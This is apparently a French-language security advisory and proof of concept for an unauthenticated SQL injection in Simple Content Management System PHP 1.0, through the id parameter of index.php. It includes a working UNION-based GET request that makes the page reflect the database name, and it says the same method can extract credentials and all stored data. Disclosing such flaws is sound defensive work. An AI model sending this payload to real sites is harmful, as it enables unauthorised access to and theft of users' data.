
Preuve de concept d'exploitation d'injection SQL dans Simple Content Management System PHP, démontrant l'extraction de données par UNION via le paramètre id dans index.php.
Une vulnérabilité d'injection SQL existe dans Simple Content Management
System PHP. Le paramètre id dans index.php n'est pas assaini
avant d'être transmis à la requête SQL, permettant à un attaquant
non authentifié d'extraire des données sensibles de la base de données,
notamment les noms de bases de données, les tables et les identifiants.
/web/index.phpidcode-projects.org
Simple Content Management System PHP
1.0
GET /web/index.php?id=1 UNION SELECT 1,database(),3-- - HTTP/1.1
Host: [target]

Le nom de la base de données est reflété sur la page, confirmant l'injection SQL.

Un attaquant distant non authentifié peut extraire l'intégralité de la base de données, y compris les identifiants, les données utilisateur et tout le contenu stocké, en utilisant une injection SQL basée sur UNION via le paramètre id.
Imad Alvi